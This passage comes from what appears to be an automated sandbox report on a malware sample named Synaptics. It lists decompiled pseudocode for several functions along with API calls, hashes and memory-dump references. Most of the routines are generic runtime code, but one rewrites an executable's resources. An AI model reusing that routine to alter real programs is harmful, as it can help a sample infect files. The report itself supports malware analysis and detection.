						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F78C();
							E00410638(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F794();
							E00410638(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E00410794(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E00410764(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040F79C();
						E00410638(_v780);
						E004109E8(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040F320();
				return E00410638(_v776);
			}






















                                                                                                                                                                                          0x004107fc
                                                                                                                                                                                          0x0041080c
                                                                                                                                                                                          0x00410813
                                                                                                                                                                                          0x00410813
                                                                                                                                                                                          0x0041081e
                                                                                                                                                                                          0x0041082c
                                                                                                                                                                                          0x0041083b
                                                                                                                                                                                          0x00410859
                                                                                                                                                                                          0x0041083d
                                                                                                                                                                                          0x00410848
                                                                                                                                                                                          0x00410848
                                                                                                                                                                                          0x00410868
                                                                                                                                                                                          0x00410874
                                                                                                                                                                                          0x00410877
                                                                                                                                                                                          0x00410879
                                                                                                                                                                                          0x0041087a
                                                                                                                                                                                          0x0041087c
                                                                                                                                                                                          0x00410882
                                                                                                                                                                                          0x00410884
                                                                                                                                                                                          0x00410893
                                                                                                                                                                                          0x00410894
                                                                                                                                                                                          0x0041089e
                                                                                                                                                                                          0x0041089f
                                                                                                                                                                                          0x004108a4
                                                                                                                                                                                          0x004108af
                                                                                                                                                                                          0x004108b0
                                                                                                                                                                                          0x004108ba
                                                                                                                                                                                          0x004108bb
                                                                                                                                                                                          0x004108c0
                                                                                                                                                                                          0x004108db
                                                                                                                                                                                          0x004108dd
                                                                                                                                                                                          0x004108de
                                                                                                                                                                                          0x004108e1
                                                                                                                                                                                          0x004108e1
                                                                                                                                                                                          0x00410882
                                                                                                                                                                                          0x004108ea
                                                                                                                                                                                          0x004108ed
                                                                                                                                                                                          0x004108ef
                                                                                                                                                                                          0x004108f0
                                                                                                                                                                                          0x004108f6
                                                                                                                                                                                          0x004108fc
                                                                                                                                                                                          0x004108fe
                                                                                                                                                                                          0x00410900
                                                                                                                                                                                          0x00410903
                                                                                                                                                                                          0x00410906
                                                                                                                                                                                          0x00410906
                                                                                                                                                                                          0x00410909
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410909
                                                                                                                                                                                          0x00410909
                                                                                                                                                                                          0x00410910
                                                                                                                                                                                          0x0041091b
                                                                                                                                                                                          0x00410923
                                                                                                                                                                                          0x0041092a
                                                                                                                                                                                          0x00410931
                                                                                                                                                                                          0x00410932
                                                                                                                                                                                          0x00410937
                                                                                                                                                                                          0x00410942
                                                                                                                                                                                          0x00410942
                                                                                                                                                                                          0x00410950
                                                                                                                                                                                          0x00410954
                                                                                                                                                                                          0x0041095a
                                                                                                                                                                                          0x0041095b
                                                                                                                                                                                          0x0041096b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0041089F
                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004108BB
                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410932
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0041095B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 920484758-0
                                                                                                                                                                                          • Opcode ID: f4434b3e376d3a5606270c734a293c14b68a231df54e7596f913469bd8c2ca55
                                                                                                                                                                                          • Instruction ID: 03341164d2f6fde75e1a46505fe440e945d96e45a0ae1fefe7a635db93ae447a
                                                                                                                                                                                          • Opcode Fuzzy Hash: f4434b3e376d3a5606270c734a293c14b68a231df54e7596f913469bd8c2ca55
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D412C75A0121D8FCB61EB59C890AC9B3BCAF48314F0041EAE54CE7202DA78AFC58F54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00477370 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 57%
                                                                                                                                                                                          			E00477370(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v13;
				long _v20;
				void* _v24;
				struct HINSTANCE__* _t47;
				int _t53;
				char _t56;
				void* _t61;
				struct HINSTANCE__* _t64;
				intOrPtr _t69;
				intOrPtr _t75;
				intOrPtr* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffec;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t81);
				_push(0x477494);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_t61 = BeginUpdateResourceA(E00404E80(_v8), 0);
				_v13 = _t61 != 0;
				if(_v13 == 0) {
					_pop(_t69);
					 *[fs:eax] = _t69;
					_push(E0047749B);
					return E004049E4( &_v12, 2);
				} else {
					 *[fs:eax] = _t83;
					_t64 =  *0x49ec78; // 0x3fb0000
					_t79 = E0041E0D0(_t64, 1, 0xa, _v12);
					_v20 =  *((intOrPtr*)( *_t79))( *[fs:eax], 0x477472, _t81);
					_v24 = E0040275C( *((intOrPtr*)( *_t79))());
					 *((intOrPtr*)( *_t79 + 0xc))();
					E00403BEC(_t79);
					_t47 =  *0x49ec78; // 0x3fb0000
					FreeLibrary(_t47);
					_t53 = UpdateResourceA(_t61, 0xa, E00404E80(_v12), 0, _v24, _v20);
					asm("sbb eax, eax");
					_v13 = _t53 + 1;
					if(EndUpdateResourceA(_t61, 0) == 0 || _v13 == 0) {
						_t56 = 0;
					} else {
						_t56 = 1;
					}
					_v13 = _t56;
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(E00477479);
					return E0040277C(_v24);
				}
			}



















                                                                                                                                                                                          0x00477371
                                                                                                                                                                                          0x00477373
                                                                                                                                                                                          0x00477379
                                                                                                                                                                                          0x0047737c
                                                                                                                                                                                          0x00477382
                                                                                                                                                                                          0x0047738a
                                                                                                                                                                                          0x00477391
                                                                                                                                                                                          0x00477392
                                                                                                                                                                                          0x00477397
                                                                                                                                                                                          0x0047739a
                                                                                                                                                                                          0x004773ad
                                                                                                                                                                                          0x004773b1
                                                                                                                                                                                          0x004773b9
                                                                                                                                                                                          0x0047747b
                                                                                                                                                                                          0x0047747e
                                                                                                                                                                                          0x00477481
                                                                                                                                                                                          0x00477493
                                                                                                                                                                                          0x004773bf
                                                                                                                                                                                          0x004773ca
                                                                                                                                                                                          0x004773d3
                                                                                                                                                                                          0x004773e5
                                                                                                                                                                                          0x004773ed
                                                                                                                                                                                          0x004773fb
                                                                                                                                                                                          0x00477408
                                                                                                                                                                                          0x0047740d
                                                                                                                                                                                          0x00477412
                                                                                                                                                                                          0x00477418
                                                                                                                                                                                          0x00477433
                                                                                                                                                                                          0x0047743b
                                                                                                                                                                                          0x0047743e
                                                                                                                                                                                          0x0047744b
                                                                                                                                                                                          0x00477453
                                                                                                                                                                                          0x00477457
                                                                                                                                                                                          0x00477457
                                                                                                                                                                                          0x00477457
                                                                                                                                                                                          0x00477459
                                                                                                                                                                                          0x0047745e
                                                                                                                                                                                          0x00477461
                                                                                                                                                                                          0x00477464
                                                                                                                                                                                          0x00477471
                                                                                                                                                                                          0x00477471

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • BeginUpdateResourceA.KERNEL32 ref: 004773A8
                                                                                                                                                                                          • FreeLibrary.KERNEL32(03FB0000,?,?,00000000,00000000,00000000,00477494,?,?,?,00000000), ref: 00477418
                                                                                                                                                                                          • UpdateResourceA.KERNEL32 ref: 00477433
                                                                                                                                                                                          • EndUpdateResourceA.KERNEL32 ref: 00477444
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ResourceUpdate$BeginFreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2368538523-0
                                                                                                                                                                                          • Opcode ID: a4a9e4d15f8a45680d995d82f89b698926ff4bb1c53140d45d5218559b395f74
                                                                                                                                                                                          • Instruction ID: 788fa2fdaf6e603f0e993ca8ed72eb25dca608fc93a6157178922b6ccb5e32dc
                                                                                                                                                                                          • Opcode Fuzzy Hash: a4a9e4d15f8a45680d995d82f89b698926ff4bb1c53140d45d5218559b395f74
                                                                                                                                                                                          • Instruction Fuzzy Hash: 66317270B04205AFD701EBB9DC41BAEBBB9EB49704F5084BAF504F7291DA79AD00C799
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CED0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040CED0(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x49e668; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040CEC4(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
				_t74 = 0x40d050;
				_t86 = 0x40d050;
				_t83 =  *0x408034; // 0x408080
				if(E00403D78(_t87, _t83) != 0) {
					_t74 = E00404E80( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00409F88(_t74, 0x40d050);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40d054;
					}
				}
				_t51 =  *0x49ddfc; // 0x407dac
				_t16 = _t51 + 4; // 0xffd1
				_t53 =  *0x49e668; // 0x400000
				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
				E00403B3C( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E0040A624(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00409F88(_v8, _t86);
			}































                                                                                                                                                                                          0x0040ced0
                                                                                                                                                                                          0x0040cedc
                                                                                                                                                                                          0x0040cedf
                                                                                                                                                                                          0x0040cee1
                                                                                                                                                                                          0x0040ceed
                                                                                                                                                                                          0x0040cefc
                                                                                                                                                                                          0x0040cf26
                                                                                                                                                                                          0x0040cf2c
                                                                                                                                                                                          0x0040cf38
                                                                                                                                                                                          0x0040cf3d
                                                                                                                                                                                          0x0040cf43
                                                                                                                                                                                          0x0040cf43
                                                                                                                                                                                          0x0040cf61
                                                                                                                                                                                          0x0040cf66
                                                                                                                                                                                          0x0040cf6b
                                                                                                                                                                                          0x0040cf72
                                                                                                                                                                                          0x0040cf7f
                                                                                                                                                                                          0x0040cf89
                                                                                                                                                                                          0x0040cf8d
                                                                                                                                                                                          0x0040cf94
                                                                                                                                                                                          0x0040cf9d
                                                                                                                                                                                          0x0040cf9d
                                                                                                                                                                                          0x0040cf94
                                                                                                                                                                                          0x0040cfae
                                                                                                                                                                                          0x0040cfb3
                                                                                                                                                                                          0x0040cfb7
                                                                                                                                                                                          0x0040cfc2
                                                                                                                                                                                          0x0040cfcf
                                                                                                                                                                                          0x0040cfda
                                                                                                                                                                                          0x0040cfe0
                                                                                                                                                                                          0x0040cfed
                                                                                                                                                                                          0x0040cff3
                                                                                                                                                                                          0x0040cffd
                                                                                                                                                                                          0x0040d003
                                                                                                                                                                                          0x0040d00a
                                                                                                                                                                                          0x0040d010
                                                                                                                                                                                          0x0040d017
                                                                                                                                                                                          0x0040d01d
                                                                                                                                                                                          0x0040d039
                                                                                                                                                                                          0x0040d04c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                          • LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                                          • Opcode ID: 29d47073ac724d389526f5602c8458d9e302834d195a018ccc538ee601599d13
                                                                                                                                                                                          • Instruction ID: b6cc919b410ec48c376b57bdd6b10f9d41704385299fbac947e4ea08e3070186
                                                                                                                                                                                          • Opcode Fuzzy Hash: 29d47073ac724d389526f5602c8458d9e302834d195a018ccc538ee601599d13
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE414270A002589BDB21DB69CC85BDAB7FDAB18305F0441FAA548F7282D7789F84CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CECE Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040CECE(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x49e668; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040CEC4(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
				_t75 = 0x40d050;
				_t89 = 0x40d050;
				_t85 =  *0x408034; // 0x408080
				if(E00403D78(_t92, _t85) != 0) {
					_t75 = E00404E80( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00409F88(_t75, 0x40d050);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40d054;
					}
				}
				_t51 =  *0x49ddfc; // 0x407dac
				_t16 = _t51 + 4; // 0xffd1
				_t53 =  *0x49e668; // 0x400000
				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
				E00403B3C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E0040A624(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00409F88(_v8, _t89);
			}































                                                                                                                                                                                          0x0040cedc
                                                                                                                                                                                          0x0040cedf
                                                                                                                                                                                          0x0040cee1
                                                                                                                                                                                          0x0040ceed
                                                                                                                                                                                          0x0040cefc
                                                                                                                                                                                          0x0040cf26
                                                                                                                                                                                          0x0040cf2c
                                                                                                                                                                                          0x0040cf38
                                                                                                                                                                                          0x0040cf3d
                                                                                                                                                                                          0x0040cf43
                                                                                                                                                                                          0x0040cf43
                                                                                                                                                                                          0x0040cf61
                                                                                                                                                                                          0x0040cf66
                                                                                                                                                                                          0x0040cf6b
                                                                                                                                                                                          0x0040cf72
                                                                                                                                                                                          0x0040cf7f
                                                                                                                                                                                          0x0040cf89
                                                                                                                                                                                          0x0040cf8d
                                                                                                                                                                                          0x0040cf94
                                                                                                                                                                                          0x0040cf9d
                                                                                                                                                                                          0x0040cf9d
                                                                                                                                                                                          0x0040cf94
                                                                                                                                                                                          0x0040cfae
                                                                                                                                                                                          0x0040cfb3
                                                                                                                                                                                          0x0040cfb7
                                                                                                                                                                                          0x0040cfc2
                                                                                                                                                                                          0x0040cfcf
                                                                                                                                                                                          0x0040cfda
                                                                                                                                                                                          0x0040cfe0
                                                                                                                                                                                          0x0040cfed
                                                                                                                                                                                          0x0040cff3
                                                                                                                                                                                          0x0040cffd
                                                                                                                                                                                          0x0040d003
                                                                                                                                                                                          0x0040d00a
                                                                                                                                                                                          0x0040d010
                                                                                                                                                                                          0x0040d017
                                                                                                                                                                                          0x0040d01d
                                                                                                                                                                                          0x0040d039
                                                                                                                                                                                          0x0040d04c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                          • LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                                          • Opcode ID: b82e1068cabe4ae57284531c3d153d5948e774c07b80ca1a7813b77d5b851ce1
                                                                                                                                                                                          • Instruction ID: 4fe94cffe00b8ae50479b7d7830d31852d6d04f91b779ba97ffbb5203982a357
                                                                                                                                                                                          • Opcode Fuzzy Hash: b82e1068cabe4ae57284531c3d153d5948e774c07b80ca1a7813b77d5b851ce1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70415270A002589BDB21DB59CC85BDAB7FD9B18305F0441FAB548F7282D7789F88CB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E174 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040E174() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x49e744 = 0x409;
				 *0x49e748 = 9;
				 *0x49e74c = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x49e744 = _t14;
				}
				if(_t14 != 0) {
					 *0x49e748 = _t14 & 0x3ff;
					 *0x49e74c = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x49b134, 0x40e2c8, 8 << 2);
				if( *0x49b0ec != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x49e751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x49e750 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040E0FC(__eflags, _t49);
					}
				} else {
					_t20 = E0040E15C();
					if(_t20 != 0) {
						 *0x49e751 = 0;
						 *0x49e750 = 0;
						return _t20;
					}
					E0040E0FC(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00403718(0x49b134, 0x20, 0x40e2c8);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x49e750 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x49e751 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x49e744; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x49e751 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                                                                                                                                                                          0x0040e180
                                                                                                                                                                                          0x0040e18a
                                                                                                                                                                                          0x0040e194
                                                                                                                                                                                          0x0040e19e
                                                                                                                                                                                          0x0040e1a5
                                                                                                                                                                                          0x0040e1a7
                                                                                                                                                                                          0x0040e1a7
                                                                                                                                                                                          0x0040e1af
                                                                                                                                                                                          0x0040e1bb
                                                                                                                                                                                          0x0040e1c7
                                                                                                                                                                                          0x0040e1c7
                                                                                                                                                                                          0x0040e1db
                                                                                                                                                                                          0x0040e1e4
                                                                                                                                                                                          0x0040e293
                                                                                                                                                                                          0x0040e298
                                                                                                                                                                                          0x0040e29d
                                                                                                                                                                                          0x0040e2a4
                                                                                                                                                                                          0x0040e2a9
                                                                                                                                                                                          0x0040e2ab
                                                                                                                                                                                          0x0040e2ae
                                                                                                                                                                                          0x0040e2b4
                                                                                                                                                                                          0x0040e2b6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040e2be
                                                                                                                                                                                          0x0040e1ea
                                                                                                                                                                                          0x0040e1ea
                                                                                                                                                                                          0x0040e1f1
                                                                                                                                                                                          0x0040e1f3
                                                                                                                                                                                          0x0040e1fa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040e1fa
                                                                                                                                                                                          0x0040e207
                                                                                                                                                                                          0x0040e217
                                                                                                                                                                                          0x0040e219
                                                                                                                                                                                          0x0040e21e
                                                                                                                                                                                          0x0040e221
                                                                                                                                                                                          0x0040e227
                                                                                                                                                                                          0x0040e229
                                                                                                                                                                                          0x0040e22b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040e22b
                                                                                                                                                                                          0x0040e237
                                                                                                                                                                                          0x0040e23c
                                                                                                                                                                                          0x0040e242
                                                                                                                                                                                          0x0040e242
                                                                                                                                                                                          0x0040e244
                                                                                                                                                                                          0x0040e245
                                                                                                                                                                                          0x0040e246
                                                                                                                                                                                          0x0040e246
                                                                                                                                                                                          0x0040e262
                                                                                                                                                                                          0x0040e268
                                                                                                                                                                                          0x0040e26d
                                                                                                                                                                                          0x0040e272
                                                                                                                                                                                          0x0040e278
                                                                                                                                                                                          0x0040e278
                                                                                                                                                                                          0x0040e27c
                                                                                                                                                                                          0x0040e27f
                                                                                                                                                                                          0x0040e285
                                                                                                                                                                                          0x0040e287
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040e289
                                                                                                                                                                                          0x0040e28c
                                                                                                                                                                                          0x0040e28c
                                                                                                                                                                                          0x0040e28d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040e28d
                                                                                                                                                                                          0x0040e278
                                                                                                                                                                                          0x0040e2c5
                                                                                                                                                                                          0x0040e2c5
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040E268
                                                                                                                                                                                          • GetThreadLocale.KERNEL32 ref: 0040E19E
                                                                                                                                                                                            • Part of subcall function 0040E0FC: GetCPInfo.KERNEL32(00000000,?), ref: 0040E115
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocaleStringThreadType
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1505017576-0
                                                                                                                                                                                          • Opcode ID: f7ab25cde628a71b1d3e7a452f9e7330cfbb9f35bc13c410db0fd2e7b91e3e0a
                                                                                                                                                                                          • Instruction ID: 1e0c14cada7a8142f74d55e3307cde86d26a5cdea6c2c893cd231fda4e8750a6
